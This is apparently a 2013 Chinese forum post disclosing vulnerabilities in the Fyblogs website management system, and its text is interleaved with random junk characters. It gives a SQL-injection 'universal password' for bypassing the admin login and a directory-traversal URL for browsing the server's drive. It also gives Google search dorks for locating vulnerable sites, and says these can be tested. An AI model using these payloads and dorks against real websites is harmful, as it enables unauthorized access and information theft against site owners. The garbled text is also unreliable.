漏洞类型: 未授权访问/权限绕过: j5 o4 L9 S3 n* P
[6 R X3 M7 Y' ~% X d6 K! q1 O简要描述:
: K9 k0 B) @0 b9 w! b1 v @- f/ h6 }* j8 t4 N3 b
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
) g0 n& b8 n% n2 P) Y1 T
1 ~4 F7 Q. ?' t) @; _+ w- W详细说明:8 i4 h& ~) C! B- J
: |5 Y4 R9 d/ S5 a3 y W$ c
后台万能密码 'or'='or'
" `) r6 e- z* z( X9 r后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 a+ O5 D& m$ vadmin/uploadfile.asp?currentFolder=/upfiles/../
: N% M1 J, ]! _
: L) K# J+ {: J0 m' X漏洞证明:
: P i* U f. ?3 q
* B' z( S& ^" h$ R- G谷歌:inurl:type.asp?id=1 新闻中心
/ {+ u- t* v. O5 f- J或者 :inurl:download_ok.asp?* i6 e& ?& p+ [ _ n: y/ R4 x" ?
; i6 \. ]& @/ G( j: A4 `2 l+ ]可以测试$ p) V; f }. X' V) V. M
; {8 `# C! D. [
, [$ M. _+ a5 R9 T8 k |
发表于 2013-3-7 13:07:46
收藏
支持
反对